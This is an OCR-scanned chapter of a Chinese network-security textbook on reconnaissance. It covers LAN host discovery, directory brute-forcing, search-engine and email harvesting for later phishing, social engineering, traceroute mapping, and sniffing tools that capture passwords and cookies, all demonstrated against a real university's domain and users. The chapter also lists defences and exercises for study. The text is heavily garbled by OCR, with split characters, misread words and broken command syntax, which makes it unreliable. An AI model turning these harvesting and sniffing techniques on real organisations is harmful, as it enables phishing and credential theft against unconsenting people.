图 2-11 fierce 工具 查询 示例 


(7) Sublist3r: 一 个 Python 版 工具 ,使 用 搜索 引擎 对 站 点 的 子 域名 进行 列举 ,融入 爆 
破 工 具 subbrute, 利 用 其 强大 的 字典 获取 更 多 子 域名 。 


2.2.2 IP 信息 收集 


远程 收集 目标 网 络 的 重要 主机 IP 地 址 信息 时 ,通常 与 DNS 信息 收集 相 结 合 , 首 先 找 
到 重要 主机 名 列表 ,然后 根据 主机 A 记录 对 应 的 IP 地 址 ,对 IP 地 址 所 在 网 段 (通常 是 C 
类 ) 执 行 反 向 域名 查询 ,收集 可 能 的 重要 IP 地 址 。DNS 信息 收集 工具 dnsenum ,fierce 和 
dnsrecon 都 支持 IP 地 址 收集 ,例如 图 2-7 和 图 2-9 所 示 , 均 可 找到 目标 域 “jxnu. edu. cn” 
所 申请 的 IP 地 址 网 段 及 重要 主机 的 IP 地 址 。 

如 果 攻 击 者 已 经 身 处 目标 网 络 的 内 网 ,那么 可 以 通过 搜索 局 域 网 IP 地 址 的 方法 来 查 
找 内 网 中 的 重要 主机 IP 地 址 。 内 网 PP 搜索 主要 有 三 种 方式 : DICMP 搜索 ; @ARP 搜 
索 ; 图 定制 的 TCP 或 UDP 报 文 查询 。 

1. ICMP 搜索 

ICMP 搜索 即 根据 自身 所 在 主机 的 IP 地 址 和 网 段 ,发送 ICMP ECHO 请 求 给 网 段 中 
的 所 有 可 能 主机 IP, 如 果 主 机 在 线 , 则 会 返回 ICMP ECHO 应 答 ,不 在 线 的 主机 不 会 返回 
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应 答 。 常 见 的 ICMP 搜索 工具 有 Quickping .netenum .nping 等 。 但 是 现在 大 部 分 主机 都 
安装 了 个 人 防护 墙 ,而 防火 墙 默认 规则 通常 会 阻止 其 他 主机 对 自身 的 ICMP 查询 请 求 , 因 
此 现在 局 域 网 IP 地 址 收集 往往 采用 ARP 查询 方法 。 
2. ARP 搜索 
ARP 即 地 址 解析 协议 ,是 根据 IP 地 址 获取 物理 地 址 的 一 个 TCP/IP 协议 。 主 机 发 
送信 息 时 将 包含 目标 IP 地 址 的 ARP 请 求 广播 到 网 络 上 的 所 有 主机 ,并 接收 返回 消息 ,以 
此 确定 目标 的 物理 地 址 ; 收 到 返回 消息 后 将 该 IP 地 址 和 物理 地 址 存 人 本 机 ARP 缓存 中 
并 保留 一 定时 间 , 下 次 请 求 时 直接 查询 ARP 缓存 以 节约 资源 。 地 址 解析 协议 建立 在 网 
络 中 各 台 主 机 互相 信任 的 基础 上 ,主机 可 以 自主 发 送 ARP 应 答 消息 ,其 他 主机 收 到 应 答 
文 时 不 会 检测 该 报 文 的 真实 性 就 会 将 其 记 入 本 机 ARP 缓存 。 
ARP 搜索 的 原理 就 是 构造 ARP 请 求 报 文 , 并 将 请 求 包 以 广播 的 形式 向 局 域 网 内 广 
播 。 这 样 与 报 文中 IP 地 址 相同 的 主机 就 会 发 送 一 个 响应 报 文 ,通过 这 个 响应 报 文 ,就 可 
以 获得 该 了 P 以 及 对 应 的 MAC 地址 。 也 就 是 说 ,网 段 中 的 主机 只 要 在 线 就 会 返回 响应 ， 
所 以 可 以 轻松 获取 局 域 网 中 所 有 在 线 主机 IP 地 址 。 
常用 IP 地 址 扫描 工具 有 : 
(1) netdiscover: 一 款 支持 主动 /被 动 的 ARP 侦查 工具 ,有 线 和 无 线 网 络 均 可 。 它 可 
以 人 ARP 查询 请 求 ,也 可 以 被 动 监听 ARP 报 文 。 图 2-12(a) 列 出 了 扫描 网 段 
“192. 168. 2.0/24” 的 结果 ,命令 示例 如 下 : 














netdiscover [ -p] -上 地 址 范围 





图 2-12 netdiscover 和 nmap 的 IP 信息 收集 结果 


(2) nmap: 一 款 经 典 的 端口 扫描 工具 ,集成 了 主机 发 现 模块 。 图 et 出 了 扫描 
网 段 “192. 168. 2.0/24” 的 结果 ( 比 netdiscover 结果 多 出 一 个 192. 168. 2. 200 ,这 是 华为 手 
机 设备 ) ,有 关 命 令 示例 如 下 : 

nmap - sn -n -v 地 址 范围 

(3) nping: nmap 工具 的 一 个 组 件 , 专 门 用 于 主机 扫描 ,与 nmap 的 主机 发 现 模 块 
类 似 。 

(4) Cain&Abel: Windows 下 的 口令 监听 和 破解 工具 ,集成 了 主机 发 现 模块 ,使 用 方 
式 如 图 2-13 所 示 。 
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(a) (b) 
图 2-13 Cain& Abel 的 IP 信息 收集 


3. TCP/UDP 查询 

目标 主机 如 果 在 线 ,那么 某 些 服务 通常 会 开启 ,可 以 通过 探测 这 些 服 务 是 否 开启 来 判 
断 目标 主机 是 否 可 以 向 目标 发 送 带 有 SYN 标记 的 TCP 报 文 , 根 据 三 路 握手 原则 ， 
当 目 标 返 回 ACK 或 RST 标记 的 报 文 时 , 即 可 判断 对 方 在 线 。 也 可 以 向 目标 发 送 带 有 
ACK 标记 的 TCP 报 文 , 不 论 指定 的 端口 是 否 打开 ,只 要 目标 主机 在 线 , 它 都 会 返回 RST 
标记 的 报 文 。 也 可 以 向 目标 发 送 空 的 UDP 报 文 ,如 果 目 标 主机 的 相应 端口 是 关闭 的 , 那 
么 它 会 返回 ICMP 端口 不 可 达 报 文 , 即 可 判断 对 方 在 线 

nmap 工具 (或 nping 组 件 ) 很 好 地 支持 此 类 查询 ,图 2-14 列 出 了 查询 网 段 192. 168. 1. 0/24 
的 IP 地 址 示例 (PS 表示 使 用 TCP 标记 ,PA 表示 ACK 标记 ,PU 表示 UDP 报 文 ), 常 用 
命令 格式 为 : 












nmap [ 一 PA [端口 ]] [ - PS [端口 ]] [ - PU [端口 ]] - sn -n 地址 范围 
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2.3 Web 挖掘 分 析 


Web 站 点 是 Internet 上 最 为 流行 的 信息 和 服务 发 布 方式 ,从 Web 站 点 中 寻找 和 搜索 
攻击 目标 的 相关 信息 也 是 一 种 网 络 踩点 方法 。 通 常 通过 谷歌 . 必 应 百度 等 搜索 引擎 进行 
目标 的 搜索 和 挖掘 ,此 类 方法 统称 为 “Google Hacking”。 根 据 挖掘 的 内 容 不 同 分 为 主页 
目录 结构 分 析 、 站 点 内 高 级 搜索 、 邮 件 地 址 收集 及 域名 和 IP 收集 等 。 


2.3.1 目录 结构 分 析 


首先 找到 目标 组 织 的 Web 主页 ,仔细 分 析 该 主页 可 以 获取 大 量 有 用 的 信息 。 然 后 ， 
分 析 其 HTML、ASP/PHP/JSP/ASPX 等 源 代码 及 其 注释 语句 也 可 能 获取 有 用 信息 ,如 
有 的 代码 中 包含 连接 数据 库 的 类 型 和 位 置 ,甚至 访问 账户 和 口令 等 。 可 以 将 目标 站 点 的 
网 页 全 部 下 载 到 本 地 ,然后 离线 分 析 。 

网 站 与 操作 系统 使 用 的 文件 系统 一 样 ,会 按照 内 容 或 功能 分 理 出 一 些 子 目录 。 有 些 
目录 是 公开 的 ,而 有 些 则 设置 了 访问 权限 不 允许 公开 ,例如 后 台 管 理 目录 、 隐 私信 息 等 。 
许多 网 站 的 后 台 管理 目录 名 字 很 常见 ,如 admin ,login .cms 等 ,有 时 手工 测试 一 下 这 些 目 
录 名 也 会 有 收获 。 如 果 权 限 允 许 , 没 有 默认 页 面 的 目录 会 以 文件 列表 的 形式 显示 ,可 以 仔 
细 分 析 这 些 文件 。 应 特别 注意 以 下 几 类 文件 ， 

(1) .inc 文 件 : 可 能 包含 网 站 的 配置 信息 ,如 数据 库 用 户 和 口令 等 。 

(2) .bak 文件 : 通常 是 源 代码 的 备份 文件 。 

(3) ,txt 或 . sql 文件 : 通常 包含 网 站 运行 的 SQL 脚本 ,可 能 包含 数据 库 结 构 等 信息 。 

此 类 工作 也 可 借助 自动 工具 通过 目录 字典 暴力 搜索 完成 ,如 Metasploit 平台 下 的 
brute_dirs、dir_listing、dir_scanner 等 模块 或 者 专用 的 Web 漏洞 扫描 工具 ,虽然 未 必 能 找 
出 全 部 目录 ,但 这 是 一 种 很 好 的 辅助 手段 。 图 2-15 使 用 两 种 模块 对 站 点 “www. jxnu. 
edu. cn 搜索 子 目 录 ,总 计 发 现 了 6 个 子 目 录 。 


















图 2-15 brute_dirs 和 dir_scanner 模块 的 目录 搜索 结果 


2.3.2 高 级 搜索 


谷歌 和 百度 搜索 均 提 供 高 级 搜索 功能 。 以 百度 为 例 ,其 高 级 搜索 如 图 2-16 所 示 ,可 
以 指定 目标 域名 及 待 搜索 的 关键 词 ,对 目标 进行 定向 分 析 , 例 如 从 “jxnu. edu. cn” 域 名 的 
搜索 结果 中 ,至 少 找到 了 两 台 主 机 : “jsjxy. jxnu. edu. cn” 和 “webadmin. jxnu. edu. cn”。 
百度 提供 的 高 级 搜索 选项 包括 : 
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(1) 包含 全 部 关键 词 ; 

(2) 包括 完整 关键 词 ; 

(3) 包含 任意 字 词 ; 

(4) 不 包含 任意 字 词 ; 

(5) 限定 页 面 时 间 : 一 天 一 周一 月 一 年 内 或 不 限时 间 ; 

(6) 限定 搜索 的 文档 格式 : 网 页 和 文件 .PDF、DOC、PPTX、EXECL、RTF 或 所 有 
格式 ; 

(7) 关键 词 位 置 : 网 页 .标题 或 URL; 

(8) 指定 搜索 的 网 站 名 。 
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(a) (b) 
图 2-16 百度 高 级 搜索 结果 


从 目标 网 站 中 搜索 特定 类 型 的 文件 有 时 会 发 现 十 分 重要 的 信息 ,例如 有 些 缺 乏 安全 
意识 的 管理 员 为 了 方便 往往 会 将 类 似 通讯 录 等 内 容 敏 感 的 文件 连接 到 网 站 上 ,此 时 使 用 
“文档 格式 ”, 高 级 搜索 “. xls” 后 级 的 文件 往往 会 有 意外 收获 。 


2.3.3 邮件 地 址 收集 


对 目标 的 用 户 邮 件 地 址 收集 也 十 分 重要 。 可 以 进一步 根据 用 户 的 生活 习惯 、 兴 趣 爱 
好 和 社交 圈子 ,向 目标 用 户 发 送 专 门 定制 的 含有 钓鱼 链接 或 恶意 附件 的 电子 邮件 ,诱骗 用 
户 点 击 从 而 完成 攻击 。 收 集邮 件 地 址 主要 有 两 种 方法 ,一 是 遍历 网 站 主页 获取 ,二 是 根据 
邮件 的 后 级 地 址 暴力 搜索 ,两 种 方法 结合 可 以 很 方便 地 获取 目标 的 大 量 邮件 地 址 。 

图 2-17(b) 给 出 了 使 用 Metasploit 的 search_email_collector 模块 从 必 应 和 雅虎 中 搜 
索 到 的 “jxnu. edu. cn” 后 缀 的 5 个 邮件 地 址 ; 图 2-17(a) 给 出 了 使 用 工具 theharvester 从 
百度 中 收集 到 的 邮件 地 址 和 主机 名 信息 。search_email_collector 模块 只 支持 从 雅虎 、 谷 
歌 和 必 应 这 3 个 搜索 引擎 中 收集 ; theharvester 工具 是 专用 收集 主机 域名 以 及 邮箱 的 工 
有 具 ,支持 十 余 种 搜索 引擎 ,而 且 可 以 定制 搜索 的 规模 ,非常 实用 。 


2.3.4 ”域名 和 IP 收集 
不 仅 可 以 通过 DNS 服务 器 枚 举 域名 和 IP 地 址 ,使 用 Web 搜索 引擎 同样 可 以 大 量 收 
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root@kali:~# theharvester -djxnu edu cn -1 500 -b baidu 
[] Searching in Baidu 

arching 500 results. 

[+] Emails found 几 十 条 地 址 
chengjian@jxnuedu cn 

jxsdxcb@jxnu.edu.cn 






jxsddbGjxnuedu en 
[+] Hosts found in search engines: /上 百 台 主 机 


[] Resolving hostnames 





202.101.194.153:wwwjxnu edu en 
202.101.194.140jwejxnueduen 











(a) 





图 2-17 邮件 地 址 收集 示例 


集 重 要 的 域名 和 主机 信息 ,如 果 综 合 多 个 引擎 的 搜索 结果 ,可 以 更 全 面 地 提供 目标 的 主机 
和 IP 地 址 信息 。 基 于 搜索 引擎 收集 信息 的 工具 有 : 

(1) theharvester: 支持 从 谷歌 雅虎 、 必 应 、 百 度 等 十 余 种 搜索 引擎 中 收集 IP 和 域名 
信息 ,常用 命令 格式 为 : 


theharvester -d [目标 域名 ] -b [搜索 引擎 ] [-n] [一 c] -1[ 指 明 从 引擎 中 搜索 的 多 少 条 结 
果 ] 


(2) dmitry: 通过 谷歌 搜索 目标 的 子 域 和 邮件 地 址 列表 ,常用 命令 格式 为 : 
dmitry -s -e 目 标 域名 


(3) recon-ng: 它 是 一 个 全 面 的 Web 探测 框架 ,集成 了 70 多 种 信息 收集 模块 ,其 中 
包括 从 各 个 搜索 引擎 收集 主机 名 和 子 域 的 模块 ,如 google_site_web、baidu_site、bing_ 
domain_web、brute_hosts 等 ; 以 及 查询 Whois 信息 和 IP 地 理 位 置 的 模块 ,如 whois_ 
miner whois_pocs freegeoip ,ipinfodb 等 ,但 是 偏重 国外 的 IP 和 域名 查询 。 


2.4 社会 工程 学 


社会 工程 学 可 以 定义 为 : 通过 操纵 人 来 实施 某 些 行为 或 泄露 机 密 信息 的 一 种 攻击 方 
法 ,实际 上 就 是 对 人 的 欺骗 。 它 通常 以 交谈 .欺骗 ,假冒 或 伪装 等 方式 开始 ,从 合法 用 户 那 
里 套 取 用 户 的 敏感 信息 ,比如 系统 配置 .口令 或 其 他 有 助 于 进一步 攻击 的 有 用 信息 。 随 着 
互联 网 技术 和 社交 平台 的 飞速 发 展 ,现在 可 以 利用 社交 网 络 进行 信息 收集 ,同时 隐藏 自己 
的 真实 身份 。 可 以 浏览 个 人 空间 和 博客 分 析 微 博 内 容 、 用 即时 聊天 工具 与 目标 实时 沟 
通 ,甚至 可 以 取得 目标 的 信任 ,获得 其 姓名 .电话 .邮箱 甚至 生日 及 其 家 人 信息 。 

社会 工程 学 收集 的 信息 来 源 包 括 一 些 非 传统 的 技术 : 

(1) 行业 专家 可 以 提供 有 关 一 个 领域 的 具体 情报 信息 ,这 些 数 据 对 于 找 出 目标 公司 
的 漏洞 会 有 一 定 帮 助 。 

(2) 与 目标 网 络 的 员工 接近 ,与 他 们 进行 寒 暗 和 对 话 ,. 也 是 收集 有 用 信息 的 一 种 
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(3) 垃圾 收集 。 目 标的 员工 可 能 会 丢弃 一 些 文件 、 信 件 或 报废 设备 ,可 以 从 中 搜寻 到 





信息 收集 需要 非常 细致 和 繁琐 的 工作 ,往往 需要 自动 工具 来 整理 和 组 织 收集 到 的 信 
息 。Maltego 就 是 一 个 高 度 自动 化 的 信息 收集 工具 ,需要 预先 注册 (国内 注册 可 能 需要 通 
过 代理 ,否则 无 法 连接 其 登录 服务 器 ) 。 它 可 以 收集 各 种 网 站 的 域名 服务 器 .服务器 的 IP 
地 址 、 子 域 或 某 个 人 的 信息 ,如 邮件 地 址 \ 博 客 、 手 机 号 、 个 人 爱好 、 地 理 位 置 工作 描述 等 ， 
它 可 以 在 Windows、Linux 和 Mac 三 种 平台 上 安装 和 使 用 。 比 起 其 他 的 信息 收集 工具 ， 
Maltego 功能 强大 ,因为 它 可 以 将 收集 的 信息 可 视 化 ,用 一 种 格外 美观 的 方式 将 结果 呈现 
给 使 用 者 。 初 始 输 入 可 以 是 域名 、 邮 箱 地 址 甚至 一 个 名 字 ,Maltego 可 以 从 多 个 不 同 的 社 
交 网 站 中 收集 与 输入 有 关 的 一 切 信息 ,并 以 图 形 化 方式 展示 它们 之 间 的 联系 。 图 2-18 列 
出 了 Maltego 的 几 个 功能 界面 。 
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(1) 收集 的 信息 列表 (2) 指定 收集 哪些 具体 信息 (3) 信息 收集 结果 的 图 形 化 展示 
图 2-18 ”Maltego 的 功能 界面 


2.5 拓扑 确定 


收集 了 足够 的 IP 地 址 和 域名 信息 后 , 接 下 来 可 以 侦查 目标 的 网 络 拓扑 结构 ,用 于 找 
到 薄弱 点 实施 人 侵 。 通 常 利 用 traceroute(UNIX) 或 tracert(Windows) 工 具 跟 踪 从 出 发 
点 前 往 目 标的 路 由 路 径 来 构建 目标 网 络 的 拓扑 结构 。 

tracetroute 是 一 种 网 络 诊断 和 获取 网 络 拓扑 结构 的 工具 ,通过 向 目标 主机 发 送 不 同 
生存 时 间 (TTL) 的 ICMP、TCP 或 UDP 报 文 来 确定 到 达 目 标 主机 的 路 由 。 根 据 IP 路 由 
规则 ,每 经 过 一 跳 路 由 转发 ,路 由 器 会 对 TTL 字段 减 1, 当 TTL 字段 减 到 0 时 ,路 由 器 将 
不 会 转发 该 报 文 ,并 向 源 IP 地 址 发 送 “ICMP TTL 过 期 ”的 应 答 消息 。 当 报 文 到 达 目 标 
时 ,如 果 是 ICMP 请 求 报 文 , 则 目标 会 返回 ICMP 应 答 ; 如 果 是 TCP 报 文 ,目标 会 返回 
TCP 确认 ; 如 果 是 UDP 报 文 ,该 UDP 报 文 的 目标 端口 一 般 为 不 常用 的 值 , 所 以 目标 主 
机 会 返回 “ICMP 目标 端口 不 可 达 ? 错 误 。 这 样 就 可 以 通过 监听 所 有 返回 的 报 文 ,确定 从 
源 到 目标 的 每 个 节点 的 IP 地 址 ,在 对 目标 网 络 的 多 台 主 机 实施 路 由 跟踪 后 ,就 可 以 集合 
这 些 路 径 信息 ,绘制 目标 网 络 的 拓扑 结构 图 ,并 标识 出 网 关 以 及 各 个 访问 控制 设备 的 分 布 
位 置 。 

由 于 路 径 中 的 交换 节点 可 能 装 有 包 过 滤 机 制 ,ICMP、TCP 和 UDP 报 文 都 可 能 被 过 
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滤 , 因 此 必须 尝试 三 种 不 同方 式 并 设置 合适 的 探测 端口 ,尽力 完成 目标 路 径 跟踪 。 
traceroute 的 命令 格式 如 下 : 


traceroute [-4] {-I| -T| -0} [一 w 等 待 时 间 ] [-p 端 口 ] [-m 最 大 跳 数 ] 


图 2-19 给 出 踪 到 主机 "www. baidu. com” 和 “www. jxnu. edu. cn” 的 路 径 显 示 ， 
可 以 看 出 前 往 “www. baidu. com” 经 过 了 11 跳 路 由 ,但 是 其 中 3 个 节点 有 包 过 滤 机 制 , 没 
有 返回 “ICMP TTL 过 期 ”的 错误 ,所 以 用 “x Te 而 访问 “www. jxnu. edu. cn” 
时 ,分 别 使 用 了 ICMP 和 TCP 追踪 ,两 者 的 结果 不 一 致 。 每 个 节点 yh TCP 报 文通 
过 ,但 是 对 于 TTL 为 0 的 TCP 报 文 ,不 会 返回 错误 信息 。 结 合 两 种 分 析 结 果 , 可 以 大 臻 
判断 路 径 上 有 7 跳 路 由 ,其 中 5 跳 可 以 确定 。 











(b) 





图 2-19 ”traceroute 的 运行 结果 对 比 


在 获取 节点 信息 后 , 接 下 来 可 以 绘制 目标 的 网 络 拓 扑 结构 图 。 基 于 traceroute 的 技 
术 原 理 , 目 前 已 有 不 少 图 形 化 的 路 由 分 析 工 具 ,能够 便捷 地 辅助 分 析 路 由 查询 结果 并 构建 
网 络 拓扑 结构 ,例如 : 

(1) Neotrace: Softonic 公司 出 品 的 图 形 网 络 路 径 追 踪 工 具 , 集 成 IP 地 理 位 置 、 
Whois 查询 和 地 图 信息 ,可 以 方便 地 分 析 中 间 节 点 的 各 种 信息 。 图 2-20 显示 了 通 往 
“mail. jxnu. edu. cn 主机 的 路 径 ,并且 可 以 在 界面 上 选择 中 间 节 点 进行 不 同 分 析 。 
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图 2-20 ”Neotrace 效果 图 
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(2) VisualRoute: VisualWare 出 品 的 一 款 网 络 路 径 节点 回溯 分 析 工 具 , 将 
traceroute、ping 以 及 Whois 等 功能 集合 在 了 一 个 简单 易 用 的 图 形 界面 里 。 它 可 以 用 来 
分 析 互 联网 的 连通 性 ,并 找到 快速 有 效 的 数据 点 以 解决 相关 问题 。 

(3) Zenmap: nmap 的 图 形 使 用 接口 , 它 集 成 traceroute 功能 (支持 ICMP、TCP 和 
UDP 追踪 ) 。 它 还 有 个 独特 的 功能 , 即 可 以 将 通 往 不 同 目标 的 路 径 连接 在 同一 张 图 片 中 ， 
如 图 2-21(a) 所 示 。 
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图 2-21 Zenmap 效果 图 


2.6 网 络 监 听 


前 面 章节 描述 的 信息 收集 方式 都 是 主动 收集 方式 ,网 络 监听 则 是 一 种 被 动 的 信息 收 
集 方法 ,往往 不 会 被 目标 察觉 。 网 络 监 听 指 捕获 网 络 上 传输 的 数据 并 进行 分 析 , 以 达到 未 
经 授权 获取 信息 的 目的 。 实 现 监听 的 最 佳 位 置 是 网 关 、 路 由 器 和 防火 墙 等 网 络 中 的 关键 
节点 ,但 是 这 些 设备 通常 比较 难以 人 侵 ,因此 通常 只 能 在 进入 内 网 后 对 局 域 网 主机 展开 
监听 。 

由 于 Internet 上 的 信息 以 明文 方式 传送 ,只 要 将 网 络 接口 设置 成 混杂 模式 ,就 可 以 记 
录 下 所 有 经 过 主机 网 卡 的 报 文 。 如 果 目 标 网 络 使 用 共享 式 局 域 网 ,数据 在 网 络 内 广播 发 
送 , 可 以 轻易 监听 所 有 信息 。 但 是 ,现代 网 络 大 部 分 都 是 交换 机 连接 的 局 域 网 ,主机 间 通 
信 不 会 向 其 他 端口 转发 .因此 仅 靠 设置 混杂 模式 还 无 法 听 到 其 他 端口 的 信息 ,需要 借助 局 
域 网 攻击 方式 ( 见 5.2 节 ) 或 者 在 交换 机 上 设置 端口 镜像 (图 2-22) 来 实现 监听 目标 。 端 口 
镜像 指 从 图 2-22 中 终端 A 发 往 终 端 B 所 在 端口 的 所 有 报 文 都 会 由 交换 机 复制 一 份 并 同 
时 转发 给 监听 设备 。 图 2-22(b) 说 明 端 口 镜像 还 可 以 跨 交换 机 实现 ,此 类 镜像 可 以 动态 
变化 ,但 是 需要 拥有 交换 机 的 管理 权限 才 可 以 完成 相应 配置 。 另 外 ,由 于 监听 会 收集 网 络 
中 的 所 有 报 文 , 因 此 有 必要 对 收集 的 信息 进行 过 滤 ,减轻 监听 主机 的 负担 ,降低 被 发 现 的 
概率 。 

网 络 监听 可 收集 目标 网 络 中 的 域名 、IP 地 址 .邮件 地 址 ,用户 账 号 和 密码 等 重要 信 
息 , 截 获 DNS 请 求 和 应 答 报 文 可 获取 域名 和 主机 IP 的 映射 关系 ,截获 SMTP 和 POP3 
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图 2-22 ”端口 镜像 实现 监听 


协议 报 文 可 获取 邮箱 地 址 ,截获 SMTP、HTTP、FTP、POP3 和 TELNET 等 网 络 协议 的 
报 文 可 以 获取 用 户 账号 和 密码 ,因为 这 些 协议 都 采用 明文 传递 数据 。 

一 个 网 络 监听 器 (或 嗅 探 器 ) 通 常 包括 : 

(1) 监听 驱动 程序 : 截获 数据 流 , 进 行 过 滤 并 存 人 缓存 ; 

(2) 捕获 驱动 程序 : 最 重要 的 部 件 ,控制 网 卡 从 信道 上 获取 数据 ,并 存 和 缓存; 

(3) 缓存 器 : 存放 截获 数据 的 内 存 或 外 存 ; 

(4) 解码 程序 : 对 接收 到 的 加 密 数据 进行 解密 ; 

(5) 报 文 分 析 器 : 对 截获 的 报 文 进行 模式 匹配 和 分 析 ,提取 感 兴趣 的 信息 。 

常用 的 网 络 监听 工具 有 Wireshark、IRIS、Tcpdump/ Windump、Sniffer Pro, 它 们 通常 
是 网 络 协议 分 析 工 具 , 主 要 用 于 网 络 防御 和 诊断 ,但 是 也 可 以 作为 监听 工具 使 用 。 专 用 的 
基于 网 络 监 听 的 信息 收集 工具 有 : 

(1) Cain&Abel: 局 域 网 账号 口令 收集 和 破解 工具 ,从 监听 的 报 文中 针对 指定 字符 串 
进行 提取 ,专用 于 截取 各 种 常见 网 络 协议 的 账号 和 口令 ,功能 强大 。 图 2-23 列 出 了 访问 
登录 网 站 “jwc. jxnu. edu. cn” 时 ,该 工具 截获 的 账号 和 口令 信息 。 可 以 看 出 左边 树 形 列 表 
中 截获 了 一 个 HTTP 数据 报 文 , 配 置 框 指明 HTTP 头 部 的 哪些 字段 标记 账号 和 口令 ,以 
便于 在 列表 中 自动 显示 。 
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图 2-23 Cain&Abel 抓 取 网 站 “jwc. jxnu. edu. cn” 的 账号 和 口令 
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(2) driftnet: 图 片 和 MPEG 音频 收集 工具 ,实时 从 各 种 网 络 协议 中 提取 图 片 数据 或 
MPEG 音频 。 图 2-24(a) 列 出 了 在 访问 域名 “news. sina. com. cn” 时 ,实时 显示 的 最 后 一 
幅 图 片 。 常 用 命令 格式 为 : 


driftnet [ -mm 指定 抓 取 图 片 数量 -al [-S] [-d 指 定 存放 目录 名 ] [BPF 过 滤器 ] 
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四 
图 2-24 driftnet 和 pof 

(3) p0f: 通过 分 析 网 络 报 文 来 判断 目标 主机 操作 系统 类 型 (如 图 2-24(b) 所 示 ,可 看 
出 目标 服务 器 “202. 101. 194. 153” 的 OS 类 型 为 Linux 2. 6. x)、 分 析 网 络 地 址 转换 
(NAT) 、 负 载 均衡 设置 应 用 代理 等 信息 。 

POf [ 一 p] [ 一 主 指定 接口 ] [BPF 过 滤器 ] 

(4) ferret: 专门 用 于 提取 各 类 协议 报 文 关键 字段 的 监听 器 ,特别 适用 于 窃取 Cookie 
和 HTTP 会 话 信息 。 如 图 2-25 所 示 ,截获 会 话 的 Cookie 信息 以 及 域名 “jwc. jxnu. edu. 
cn” 的 IP 地址。 

防止 监听 的 手段 主要 有 以 下 几 种 : 

(1) 检测 监听 器 。 只 需要 检查 网 络 中 某 个 主机 的 网 卡 处 于 混杂 模式 , 即 可 判断 该 主 
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图 2-25 ”ferret 对 访问 “jwc. jxnu. edu. cn” 的 报 文 关 键 字 段 提 取 


机 正在 运行 监听 器 。 通 常 是 向 本 地 网 络 中 的 主机 发 送 一 些 特殊 的 以 太 网 报 文 ,然后 根据 
响应 来 判断 。 比 如 分 别 向 正常 主机 和 监听 主机 发 送 ICMP ECHO 请 求 ,但 是 在 以 太 网 帧 
上 设置 错误 的 MAC 地 址 ,那么 监听 主机 会 返回 应 答 而 正常 主机 不 会 。 另 外 ,如 果 发 现 丢 
包 率 很 高 或 者 某 台 主机 占用 较 高 带宽 ,也 说 明 网 络 中 可 能 存在 监听 器 。 

(2) 会 话 加 密 。 传 统 网 络 服务 程序 在 本 质 上 都 不 安全 ,因为 它们 都 使 用 明文 传输 口 
令 和 数据 ,但 是 如 果 用 户 使 用 SSH 进行 通信 ,由 于 所 有 的 数据 都 经 过 加 密 , 即 使 攻击 者 监 
听 到 信息 ,也 毫 无 用 处 。 

(3) 网 络 使 用 安全 的 拓扑 结构 。 一 是 物理 上 对 网 络 分 段 ,将 非法 用 户 与 敏感 网 络 资 
源 分 离 ; 二 是 好 辑 上 分 段 ,运用 虚拟 局 域 网 技术 隔离 不 必要 的 数据 传输 。 


2.7 小 结 


本 童 描述 了 各 种 常见 信息 收集 方法 ,包括 Whois 查询 、 基 于 DNS 服务 器 的 信息 收 
集 、 基 于 Web 的 挖掘 和 搜索 .社会 工程 学 收集 .拓扑 收集 和 网 络 监听 方法 。 

Whois 查询 可 以 通过 公共 网 站 提供 的 查询 方式 进行 公开 查询 ,有 IP Whois、DNS 
Whois、Whois 反 查 ,IP2Location、IP2Domain 等 多 种 查询 方式 ,可 以 结合 不 同 查 询 方 式 综 
合 获 取 目 标的 域名 和 IP 所 有 者 、 联 系 方式 、 注 册 商 ,注册 时 间 和 到 期 时 间 等 详细 信息 。 

基于 DNS 服务 器 的 收集 方式 包括 : 四 通过 向 目标 服务 器 发 起 查询 请 求 ,收集 DNS 
的 资源 记录 信息 ,包括 ANS.CNAME 和 PTR 记录 等 ,常用 工具 有 host 和 dig; 四 结合 
字典 暴力 枚 举 ,收集 目标 域名 下 的 子 域 信息 ,递归 获取 目标 域名 下 的 完整 信息 ,常用 工具 
有 dnsenum、dnstracer、dnsrecon 和 fierce 等 。 

在 目标 网 络 内 部 ,可 以 采用 ICMP 搜索 ,ARP 搜索 和 定制 的 UDP/TCP 查询 方式 来 
检测 哪些 主机 IP 在 线 。 

基于 Web 的 挖掘 内 容 主 要 包括 : 四 网 站 的 目录 结构 ,从 网 站 文件 中 收集 重要 信息 ， 
四 利用 搜索 引擎 的 高 级 搜索 功能 ,根据 需要 收集 的 目标 设计 关键 词 ,搜索 目标 中 的 特定 信 
息 ; 加 利用 搜索 引擎 收集 目标 域名 的 邮件 地 址 列表 ,以 便 进 一 步 展 开 钓 鱼 或 木马 攻击 ,如 
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自动 工具 theharvester; @ 从 多 个 不 同 引 擎 中 收集 出 现 过 的 域名 和 IP 地 址 信息 ,自动 工 
具有 dmitry 和 recon-ng。 

利用 社会 工程 学 收集 信息 是 一 件 繁重 的 工作 ,可 以 利用 自动 工具 收集 社交 网 站 上 的 
信息 来 完成 。Maltego 可 以 根据 域名 .邮箱 或 者 人 的 姓名 从 不 同 社交 网 站 上 收集 一 切 有 
关 的 社会 信息 ,并 以 图 形 化 的 方式 展现 。 

除了 收集 目标 主机 的 详细 信息 之 外 ,侦查 目标 网 络 的 拓扑 结构 也 十 分 必要 ,可 以 发 现 
目标 网 络 的 薄弱 点 。 常 用 方法 是 使 用 traceroute 类 工具 跟踪 从 出 发 点 到 目标 的 网 络 路 
径 , 它 支持 ICMP、TCP 和 UDP 三 种 方式 追踪 路 径 , 并 以 拓扑 图 的 形式 展现 给 用 户 ,常用 
工具 有 Zenmap、Neotrace 和 Visualroute 等 。 

在 身 处 目标 网 络 内 部 时 .网络 监听 作为 一 种 被 动 信息 收集 方式 难以 被 对 方 察觉 ,除了 
收集 域名 、IP 和 邮箱 地 址 外 ,还 可 以 用 于 收集 重要 的 账号 和 口令 以 及 目标 的 操作 系统 类 
型 等 信息 ,专用 工具 有 Cain&.Abel、p0f、driftnet 和 ferret 等 。 防 御 网 络 监听 的 方法 包括 
主动 检测 处 于 混杂 模式 的 主机 、 加 密 所 有 通信 以 及 划分 安全 的 拓扑 结构 等 。 


习 题 


2-1 Whois 查询 结果 有 哪些 方法 ? 分别 可 以 收集 哪些 信息 ? 

2-2 dig 和 host 可 以 完成 哪些 DNS 查询 ? 

2-3 请 说 明 dnsenum 中 子 域 枚 举 和 IP 网 段 收 集 的 实现 原理 。 

2-4 请 说 明 ARP 搜索 局 域 网 IP 的 基本 原理 。 

2-5 请 说 明 TCP/UDP 搜索 局 域 网 主机 的 基本 原理 。 如 果 所 有 Windows 主机 都 装 
有 个 人 防火 墙 , 那 么 还 能 搜索 出 在 线 主机 吗 ? 为 什么 ? 

